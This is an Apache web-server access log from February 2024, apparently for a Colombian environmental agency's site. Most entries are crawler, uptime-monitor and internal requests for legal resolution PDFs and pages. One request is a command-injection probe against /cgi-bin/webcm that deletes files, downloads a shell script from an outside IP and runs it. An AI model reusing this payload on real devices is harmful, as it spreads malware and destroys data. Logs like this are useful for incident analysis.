167.248.133.49 - - [20/Feb/2024:03:38:17 -0500] "PRI * HTTP/2.0" 400 946
172.22.2.4 - - [20/Feb/2024:03:36:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
201.245.192.253 - - [20/Feb/2024:03:39:25 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [20/Feb/2024:03:39:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37696
201.245.192.253 - - [20/Feb/2024:03:39:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38969
201.245.192.253 - - [20/Feb/2024:03:39:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35689
201.245.192.253 - - [20/Feb/2024:03:39:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35689
216.245.221.92 - - [20/Feb/2024:03:41:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:03:41:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.191 - - [20/Feb/2024:03:44:06 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2015%2F HTTP/1.1" 200 585318
172.22.2.4 - - [20/Feb/2024:03:42:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
52.167.144.199 - - [20/Feb/2024:03:44:20 -0500] "GET /sitemap.txt HTTP/1.1" 404 1018
216.245.221.92 - - [20/Feb/2024:03:46:31 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [20/Feb/2024:03:47:06 -0500] "GET /robots.txt HTTP/1.1" 404 1018
173.252.79.119 - - [20/Feb/2024:03:48:51 -0500] "GET /images/27%20de%20enero%20Soratama.jpg HTTP/1.1" 200 63397
172.22.2.4 - - [20/Feb/2024:03:47:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:03:48:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
216.245.221.92 - - [20/Feb/2024:03:51:31 -0500] "HEAD / HTTP/1.1" 200 -
162.55.165.184 - - [20/Feb/2024:03:52:47 -0500] "GET / HTTP/1.1" 200 4720
66.249.66.165 - - [20/Feb/2024:03:53:14 -0500] "GET /portaldeninos/los-arboles/tips/ HTTP/1.1" 200 87677
66.249.66.166 - - [20/Feb/2024:03:53:19 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
172.22.2.4 - - [20/Feb/2024:03:53:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:03:54:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
216.245.221.92 - - [20/Feb/2024:03:56:31 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.55 - - [20/Feb/2024:03:57:56 -0500] "GET /mejora-tu-bienestar-con-las-caminatas-ecologicas-%C3%82%C2%A1conoce-la-programacion-de-agosto.html HTTP/1.1" 200 873
40.77.167.60 - - [20/Feb/2024:03:59:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4389.pdf HTTP/1.1" 304 -
66.249.66.20 - - [20/Feb/2024:03:59:46 -0500] "GET /BLA/resoluciones/Autos%202008/1964.pdf HTTP/1.1" 200 91704
172.22.2.4 - - [20/Feb/2024:03:59:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [20/Feb/2024:04:01:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:04:00:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
185.224.128.55 - - [20/Feb/2024:04:02:09 -0500] "GET / HTTP/1.1" 200 319
66.249.66.37 - - [20/Feb/2024:04:04:16 -0500] "GET /robots.txt HTTP/1.1" 404 1034
66.249.66.37 - - [20/Feb/2024:04:04:16 -0500] "GET /manual-de-ecourbanismo-y-construccion-sostenible-reglas-claras-para-los-nuevos-proyectos-de-construccion HTTP/1.1" 404 1034
216.245.221.92 - - [20/Feb/2024:04:06:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:04:06:43 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [20/Feb/2024:04:05:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:04:05:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58711
66.249.66.19 - - [20/Feb/2024:04:08:12 -0500] "GET /BLA/resoluciones/AUTOS%202008/1027.pdf HTTP/1.1" 200 165474
52.167.144.17 - - [20/Feb/2024:04:09:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/2572.pdf HTTP/1.1" 200 1379149
52.167.144.181 - - [20/Feb/2024:04:10:06 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+1997%2F HTTP/1.1" 200 17831
172.22.2.4 - - [20/Feb/2024:04:10:09 -0500] "GET /BLA/boletinlegal/sitemap.xml HTTP/1.1" 404 1037
40.77.167.67 - - [20/Feb/2024:04:10:55 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
216.245.221.92 - - [20/Feb/2024:04:11:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:04:10:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:04:11:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
66.249.66.21 - - [20/Feb/2024:04:15:01 -0500] "GET /portel_dama/libreria/php/2006/ECOSISTEMAS%20FINAL%20web_mz27/x%20restauracion/sitio/22_proye/xtras_in/2a.pdf HTTP/1.1" 404 1018
216.244.66.195 - - [20/Feb/2024:04:15:05 -0500] "GET /BLA/resoluciones/AUTOS%202023/2273.pdf HTTP/1.1" 200 555493
66.249.66.19 - - [20/Feb/2024:04:15:07 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202021/5500.pdf HTTP/1.1" 200 397626
216.244.66.195 - - [20/Feb/2024:04:15:38 -0500] "GET /BLA/resoluciones/AUTOS%202023/2304.pdf HTTP/1.1" 200 411033
66.249.66.20 - - [20/Feb/2024:04:15:45 -0500] "GET /BLA/resoluciones/Autos%202008/2154.pdf HTTP/1.1" 200 288606
216.244.66.195 - - [20/Feb/2024:04:16:23 -0500] "GET /BLA/resoluciones/AUTOS%202023/2916.pdf HTTP/1.1" 200 422670
216.245.221.92 - - [20/Feb/2024:04:16:31 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [20/Feb/2024:04:17:06 -0500] "GET /BLA/resoluciones/AUTOS%202023/3491.pdf HTTP/1.1" 200 425049
172.22.2.4 - - [20/Feb/2024:04:16:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.60 - - [20/Feb/2024:04:18:51 -0500] "GET /BLA/resoluciones/AUTOS%202022/0438.pdf HTTP/1.1" 304 -
66.249.66.20 - - [20/Feb/2024:04:18:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1156.pdf HTTP/1.1" 200 461558
172.22.2.4 - - [20/Feb/2024:04:17:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
201.245.192.253 - - [20/Feb/2024:04:19:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37705
201.245.192.253 - - [20/Feb/2024:04:19:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38963
201.245.192.253 - - [20/Feb/2024:04:19:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35697
201.245.192.253 - - [20/Feb/2024:04:19:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35697
69.63.184.8 - - [20/Feb/2024:04:21:29 -0500] "GET /images/Comprimida%20incendios.jpg HTTP/1.1" 200 23316
216.245.221.92 - - [20/Feb/2024:04:21:31 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.70 - - [20/Feb/2024:04:21:33 -0500] "GET /BLA/resoluciones/AUTOS%202020/3783.pdf HTTP/1.1" 304 -
40.77.167.241 - - [20/Feb/2024:04:23:26 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
40.77.167.241 - - [20/Feb/2024:04:23:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
40.77.167.241 - - [20/Feb/2024:04:23:27 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
40.77.167.241 - - [20/Feb/2024:04:23:27 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
40.77.167.241 - - [20/Feb/2024:04:23:28 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
40.77.167.241 - - [20/Feb/2024:04:23:28 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
52.167.144.216 - - [20/Feb/2024:04:23:30 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
40.77.167.54 - - [20/Feb/2024:04:23:32 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 200 542
40.77.167.54 - - [20/Feb/2024:04:23:32 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
52.167.144.216 - - [20/Feb/2024:04:23:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
52.167.144.216 - - [20/Feb/2024:04:23:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
172.22.2.4 - - [20/Feb/2024:04:22:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:04:23:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
66.249.66.20 - - [20/Feb/2024:04:26:04 -0500] "GET /resoluciones/RESOLUCIONES%202010/1390.pdf HTTP/1.1" 404 1018
150.109.253.34 - - [20/Feb/2024:04:26:07 -0500] "GET / HTTP/1.1" 200 319
52.167.144.216 - - [20/Feb/2024:04:26:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/3267.pdf HTTP/1.1" 304 -
216.245.221.92 - - [20/Feb/2024:04:26:31 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [20/Feb/2024:04:29:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37705
201.245.192.253 - - [20/Feb/2024:04:29:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38963
201.245.192.253 - - [20/Feb/2024:04:29:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35697
201.245.192.253 - - [20/Feb/2024:04:29:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35697
172.22.2.4 - - [20/Feb/2024:04:28:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.238 - - [20/Feb/2024:04:30:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/4188.pdf HTTP/1.1" 200 397400
172.22.2.4 - - [20/Feb/2024:04:29:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60371
216.245.221.92 - - [20/Feb/2024:04:31:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:04:31:35 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17637
172.22.2.4 - - [20/Feb/2024:04:31:54 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [20/Feb/2024:04:31:54 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [20/Feb/2024:04:31:58 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
66.249.66.21 - - [20/Feb/2024:04:33:42 -0500] "GET /BLA/resoluciones/AUTOS%202009/1999.pdf HTTP/1.1" 200 101325
52.167.144.16 - - [20/Feb/2024:04:34:42 -0500] "GET /sitemap.txt HTTP/1.1" 404 1018
172.22.2.4 - - [20/Feb/2024:04:34:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.37 - - [20/Feb/2024:04:35:57 -0500] "GET /varios-individuos-de-fauna-regresaron-a-la-libertad-en-el-dia-nacional-de-la-vida-silvestre.html HTTP/1.1" 200 870
216.245.221.92 - - [20/Feb/2024:04:36:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:04:35:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
66.249.66.19 - - [20/Feb/2024:04:37:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/4308.pdf HTTP/1.1" 200 165747
216.244.66.195 - - [20/Feb/2024:04:38:25 -0500] "GET /robots.txt HTTP/1.1" 404 1018
40.77.189.4 - - [20/Feb/2024:04:39:17 -0500] "GET /sipse/faces/presentacion/sistema/faces/index.xhtml HTTP/1.1" 500 383
201.245.192.253 - - [20/Feb/2024:04:39:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37705
201.245.192.253 - - [20/Feb/2024:04:39:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38963
201.245.192.253 - - [20/Feb/2024:04:39:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35697
201.245.192.253 - - [20/Feb/2024:04:39:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35697
216.245.221.92 - - [20/Feb/2024:04:41:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:04:40:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.20 - - [20/Feb/2024:04:42:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0621.pdf HTTP/1.1" 200 219315
172.22.2.4 - - [20/Feb/2024:04:40:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
66.249.66.21 - - [20/Feb/2024:04:44:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/0228.pdf HTTP/1.1" 200 240848
74.125.210.173 - - [20/Feb/2024:04:44:57 -0500] "GET /images/jardines-verticales_optimized.jpeg HTTP/1.1" 200 138197
216.245.221.92 - - [20/Feb/2024:04:46:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:04:45:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.143 - - [20/Feb/2024:04:47:46 -0500] "GET /portaldeninos/wp-content/uploads/2020/05/fb.jpg HTTP/1.1" 200 9893
172.22.2.4 - - [20/Feb/2024:04:46:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
52.167.144.238 - - [20/Feb/2024:04:50:37 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
40.77.167.8 - - [20/Feb/2024:04:50:41 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
216.245.221.92 - - [20/Feb/2024:04:51:31 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.20 - - [20/Feb/2024:04:51:40 -0500] "GET /robots.txt HTTP/1.1" 404 1018
66.249.66.21 - - [20/Feb/2024:04:51:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/4792.pdf HTTP/1.1" 200 379686
172.22.2.4 - - [20/Feb/2024:04:51:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:04:52:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57880
216.245.221.92 - - [20/Feb/2024:04:56:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:04:57:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:04:58:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
66.249.66.19 - - [20/Feb/2024:05:00:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2869.pdf HTTP/1.1" 200 530664
172.22.2.4 - - [20/Feb/2024:05:00:39 -0500] "GET /BLA/boletinlegal/Circulares/ HTTP/1.1" 200 535
40.77.167.76 - - [20/Feb/2024:05:00:53 -0500] "GET /BLA/resoluciones/AUTOS%202013/1131.pdf HTTP/1.1" 200 990650
216.245.221.92 - - [20/Feb/2024:05:01:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:05:03:21 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1037
172.22.2.4 - - [20/Feb/2024:05:03:22 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1037
172.22.2.4 - - [20/Feb/2024:05:03:57 -0500] "GET /BLA/boletinlegal/sitemap.xml HTTP/1.1" 404 1037
172.22.2.4 - - [20/Feb/2024:05:03:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:05:04:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
172.22.2.4 - - [20/Feb/2024:05:05:59 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8397
40.77.167.10 - - [20/Feb/2024:05:06:01 -0500] "GET /BLA/resoluciones/AUTOS%202013/3301.pdf HTTP/1.1" 304 -
216.245.221.92 - - [20/Feb/2024:05:06:31 -0500] "HEAD / HTTP/1.1" 200 -
191.156.187.101 - - [20/Feb/2024:05:06:36 -0500] "GET /si-tienes-ropa-y-calzado-que-ya-no-usas-aca-te-presentamos-seis-puntos-a-donde-los-puedes-llevar.html HTTP/1.1" 200 872
191.19.66.224 - - [20/Feb/2024:05:06:38 -0500] "GET / HTTP/1.0" 200 319
199.16.157.183 - - [20/Feb/2024:05:06:51 -0500] "GET /images/presentaci%C3%B3n%20convenci%C3%B3n.jpg HTTP/1.1" 404 1034
40.77.167.10 - - [20/Feb/2024:05:07:45 -0500] "GET /appsia/ HTTP/1.1" 302 -
40.77.167.10 - - [20/Feb/2024:05:07:46 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
66.249.66.19 - - [20/Feb/2024:05:08:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/2315.pdf HTTP/1.1" 200 688475
172.22.2.4 - - [20/Feb/2024:05:09:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [20/Feb/2024:05:11:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:05:10:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
66.249.66.20 - - [20/Feb/2024:05:12:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3671.pdf HTTP/1.1" 200 145984
40.77.167.79 - - [20/Feb/2024:05:13:37 -0500] "GET /BLA/resoluciones/AUTOS%202019/3913.pdf HTTP/1.1" 304 -
66.249.66.21 - - [20/Feb/2024:05:14:59 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202021/4921.pdf HTTP/1.1" 200 379574
40.77.167.22 - - [20/Feb/2024:05:15:18 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12726
216.244.66.195 - - [20/Feb/2024:05:16:16 -0500] "GET /BLA/resoluciones/AUTOS%202023/2375.pdf HTTP/1.1" 200 596159
216.244.66.195 - - [20/Feb/2024:05:16:22 -0500] "GET /BLA/resoluciones/AUTOS%202023/2933.pdf HTTP/1.1" 200 380801
216.244.66.195 - - [20/Feb/2024:05:16:27 -0500] "GET /BLA/resoluciones/AUTOS%202023/3489.pdf HTTP/1.1" 200 456828
66.249.66.19 - - [20/Feb/2024:05:16:30 -0500] "GET /Publicaciones/2023EE310577.pdf HTTP/1.1" 404 228
216.245.221.92 - - [20/Feb/2024:05:16:31 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.21 - - [20/Feb/2024:05:16:31 -0500] "GET /Publicaciones/2023EE286528.pdf HTTP/1.1" 404 228
66.249.66.21 - - [20/Feb/2024:05:16:32 -0500] "GET /Publicaciones/2023EE290977.pdf HTTP/1.1" 404 228
172.22.2.4 - - [20/Feb/2024:05:15:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.166 - - [20/Feb/2024:05:16:56 -0500] "GET /BLA/resoluciones/AUTOS%202023/4932.pdf HTTP/1.1" 200 451079
172.22.2.4 - - [20/Feb/2024:05:15:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
172.22.2.4 - - [20/Feb/2024:05:17:40 -0500] "GET /BLA/boletinlegal/conceptos/ HTTP/1.1" 200 533
172.22.2.4 - - [20/Feb/2024:05:19:26 -0500] "GET /BLA/boletinlegal/dns-query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1" 404 1018
201.245.192.253 - - [20/Feb/2024:05:19:24 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37703
201.245.192.253 - - [20/Feb/2024:05:19:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39128
201.245.192.253 - - [20/Feb/2024:05:19:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35702
201.245.192.253 - - [20/Feb/2024:05:19:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35702
216.245.221.92 - - [20/Feb/2024:05:21:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:05:20:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:05:21:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60371
216.245.221.92 - - [20/Feb/2024:05:26:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:05:26:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:05:27:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
201.245.192.253 - - [20/Feb/2024:05:29:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37703
201.245.192.253 - - [20/Feb/2024:05:29:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39128
201.245.192.253 - - [20/Feb/2024:05:29:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35702
201.245.192.253 - - [20/Feb/2024:05:29:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35702
216.245.221.92 - - [20/Feb/2024:05:31:31 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.145 - - [20/Feb/2024:05:34:14 -0500] "GET /images/CATALOGO.jpg HTTP/1.1" 200 35661
172.22.2.4 - - [20/Feb/2024:05:32:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [20/Feb/2024:05:33:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
156.59.198.136 - - [20/Feb/2024:05:35:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5785.pdf HTTP/1.0" 200 998341
156.59.198.135 - - [20/Feb/2024:05:36:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/7336.pdf HTTP/1.0" 200 660842
172.22.2.4 - - [20/Feb/2024:05:36:30 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [20/Feb/2024:05:36:30 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%202%20del%2031%20de%20Mayo%20de%202011.pdf HTTP/1.1" 304 -
216.245.221.92 - - [20/Feb/2024:05:36:31 -0500] "HEAD / HTTP/1.1" 200 -
156.59.198.136 - - [20/Feb/2024:05:36:32 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3219.pdf HTTP/1.0" 200 985999
156.59.198.135 - - [20/Feb/2024:05:36:57 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3288.pdf HTTP/1.0" 200 671742
156.59.198.136 - - [20/Feb/2024:05:37:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4163.pdf HTTP/1.0" 200 675126
156.59.198.135 - - [20/Feb/2024:05:37:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3675.pdf HTTP/1.0" 200 1072185
156.59.198.135 - - [20/Feb/2024:05:38:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6777.pdf HTTP/1.0" 200 690626
156.59.198.135 - - [20/Feb/2024:05:38:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5789.pdf HTTP/1.0" 200 1207604
156.59.198.135 - - [20/Feb/2024:05:39:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5000.pdf HTTP/1.0" 200 700029
156.59.198.136 - - [20/Feb/2024:05:39:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5987.pdf HTTP/1.0" 200 676602
201.245.192.253 - - [20/Feb/2024:05:39:24 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37703
201.245.192.253 - - [20/Feb/2024:05:39:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39128
201.245.192.253 - - [20/Feb/2024:05:39:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35702
156.59.198.136 - - [20/Feb/2024:05:39:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/7088.pdf HTTP/1.0" 200 1275727
201.245.192.253 - - [20/Feb/2024:05:39:52 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35702
172.22.2.4 - - [20/Feb/2024:05:38:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
156.59.198.135 - - [20/Feb/2024:05:40:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2719.pdf HTTP/1.0" 200 655604
156.59.198.136 - - [20/Feb/2024:05:40:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4240.pdf HTTP/1.0" 200 724728
172.22.2.4 - - [20/Feb/2024:05:39:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
156.59.198.135 - - [20/Feb/2024:05:41:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/6140.pdf HTTP/1.0" 200 789905
101.68.4.115 - - [20/Feb/2024:05:41:17 -0500] "GET / HTTP/1.1" 200 319
185.224.128.200 - - [20/Feb/2024:05:41:19 -0500] "GET /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20rm%20-rf%20*;%20cd%20/tmp;%20wget%20http://45.95.146.43/bruh.sh;%20chmod 777%20bruh.sh;%20./bruh.sh%20%26 HTTP/1.1" 404 1018
156.59.198.135 - - [20/Feb/2024:05:41:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4196.pdf HTTP/1.0" 200 1166267
216.245.221.92 - - [20/Feb/2024:05:41:31 -0500] "HEAD / HTTP/1.1" 200 -
156.59.198.135 - - [20/Feb/2024:05:41:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5139.pdf HTTP/1.0" 200 766635
156.59.198.136 - - [20/Feb/2024:05:42:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4065.pdf HTTP/1.0" 200 706125
42.92.121.199 - - [20/Feb/2024:05:42:16 -0500] "GET / HTTP/1.1" 200 319
1.83.125.74 - - [20/Feb/2024:05:42:17 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
123.178.210.226 - - [20/Feb/2024:05:42:32 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
156.59.198.136 - - [20/Feb/2024:05:42:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3072.pdf HTTP/1.0" 200 665065
156.59.198.136 - - [20/Feb/2024:05:43:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1819.pdf HTTP/1.0" 200 1728665
156.59.198.135 - - [20/Feb/2024:05:43:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4120.pdf HTTP/1.0" 200 670494
156.59.198.135 - - [20/Feb/2024:05:43:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4620.pdf HTTP/1.0" 200 646143
156.59.198.136 - - [20/Feb/2024:05:44:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5005.pdf HTTP/1.0" 200 703481
156.59.198.136 - - [20/Feb/2024:05:44:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3246.pdf HTTP/1.0" 200 864013
156.59.198.136 - - [20/Feb/2024:05:45:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4419.pdf HTTP/1.0" 200 662153
156.59.198.135 - - [20/Feb/2024:05:45:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/3496.pdf HTTP/1.0" 200 702618
172.22.2.4 - - [20/Feb/2024:05:44:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
